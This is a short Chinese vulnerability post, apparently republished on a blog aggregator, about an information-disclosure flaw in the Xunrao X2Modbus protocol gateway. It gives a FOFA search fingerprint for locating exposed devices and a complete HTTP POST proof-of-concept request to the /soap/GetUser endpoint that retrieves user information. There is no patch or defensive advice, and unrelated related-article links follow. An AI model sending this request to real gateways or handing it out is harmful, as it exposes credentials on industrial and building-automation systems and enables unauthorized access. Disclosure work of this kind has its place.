当前位置: 首页 > news >正文

漏洞挖掘---迅饶科技X2Modbus网关-GetUser信息泄露漏洞

        一、迅饶科技 X2Modbus 网关

迅饶科技 X2Modbus 网关是功能强大的协议转换利器。“X” 代表多种不同通信协议,能将近 200 种协议同时转为 Modbus RTU 和 TCP 服务器 。支持 PC、手机端等访问监控,可解决组态软件连接不常见控制设备难题,广泛用于楼控自动化等领域 。

        二、FOFA-Search...

body="/jsoa/login.jsp"

        三、POC

POST /soap/GetUser HTTP/1.1
Host: ......
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Length: 58
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

<GetUser><User Name="admin" Password="admin"/></GetUser>

                                                                                                                              FROM  IYU_

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.dtcms.com/a/101264.html

相关文章:

  • 基于javaweb的SSM公寓房屋出租系统设计与实现(源码+文档+部署讲解)
  • 五.ubuntu20.04 - ffmpeg推拉流以及Nginx、SRS本地部署
  • Maven 构建生命周期
  • React(六)React过渡动画-CSS编写方式
  • Altium Designer 24 PCB编辑器[设计]栏找不到[规则]选项而只有[Constraints Manager]选项
  • 【操作系统】内存泄漏 vs 内存碎片
  • 游戏开发中的贝塞尔曲线:感受丝滑的数学之美
  • UE学习记录part11
  • DHT11数字温湿度传感器驱动开发全解析(中) | 零基础入门STM32第八十七步
  • 回调后门基础
  • Day18 -实例:app信息收集工具(Appinfoscanner、Mobsf)的配置和使用
  • 从PDF到精准答案:Coze助力RAGFlow框架提升数据召回率
  • Java基本类型深度解析:从内存模型到高效编程实践
  • 【MinerU】可本地部署的PDF解析器
  • HCIP-6 DHCP
  • 软考 中级软件设计师 考点知识点笔记总结 day08 算法设计与分析
  • 设计模式 Day 1:单例模式(Singleton Pattern)详解
  • 《Operating System Concepts》阅读笔记:p495-p511
  • argparse的使用
  • 【前端】【React】第四章:深入理解 React Router 及前端路由管理
  • 使用 mpstat 与 stress-ng 进行 CPU 性能监控
  • 从0到1的数据结构教程——深入思考动态数组
  • 记录一下最近参与实习 外包 社招流程里的一些感悟
  • Java EE(18)——网络原理——应用层HTTP协议
  • 内网渗透-网络分离免杀
  • git --- cherry pick
  • 深入解析C++模板:从基础到高级应用
  • AI Agent开发大全第十五课-零售智能导购Agent的代码实现
  • Nginx RTMP 处理模块 (ngx_rtmp_handler.c) 详细分析
  • 1371. 货币系统-dp背包问题